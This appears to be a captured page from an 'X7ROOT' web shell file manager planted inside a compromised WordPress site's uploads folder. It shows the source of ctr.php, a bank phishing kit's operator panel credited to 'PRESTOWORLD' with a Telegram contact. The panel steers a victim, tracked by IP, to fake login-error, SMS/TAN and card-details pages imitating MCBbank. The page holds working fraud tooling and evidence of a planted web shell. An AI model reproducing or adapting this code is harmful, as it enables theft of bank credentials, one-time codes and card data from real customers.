X7ROOT File Manager
Current Path:
/home/okeydcqc/okagallery.com/wp-content/uploads/logs/d/d/MCBsession/panel
home
/
okeydcqc
/
okagallery.com
/
wp-content
/
uploads
/
logs
/
d
/
d
/
MCBsession
/
panel
/
ðŸ“
..
📄
.htaccess
(237 B)
📄
ctr.php
(1.18 KB)
📄
fetch.php
(408 B)
ðŸ“
graveyard
📄
index.php
(0 B)
📄
panel.class.php
(1.16 KB)
ðŸ“
res
Editing: ctr.php
<?php /************************* * AUTHOR : PRESTOWORLD * CONTACT : https://t.me/prestoworldunderground **************************/ require 'panel.class.php'; $pnl = new Panel(); if(isset($_GET['page'], $_GET['ip'])){ $pnl->editVicFIle($_GET['page'], $_GET['ip']); header("location: ctr.php?ip=".$_GET['ip']."&redirected"); } ?> <!doctype html> <html> <head> <title>Redirection Panel</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="res/style.css"> </head> <body> <div class="btns"> <?php if(isset($_GET['redirected'])){ echo "<h1>Redirected!</h1>"; } ?> <form action="ctr.php" method="get"> <input type="hidden" name="ip" value="<?php echo @$_GET['ip'];?>"> <button type="submit" name="page" value="user2.php?error">LOGIN ERROR</button> <button type="submit" name="page" value="tan.php">SMS/TAN</button> <button type="submit" name="page" value="tan2.php?error">SMS/TAN ERROR</button> <button type="submit" name="page" value="card.php">DETAILS</button> <button type="submit" name="page" value="out.php">MCBbank</button> </form> </div> </body> </html>
Upload File
Create Folder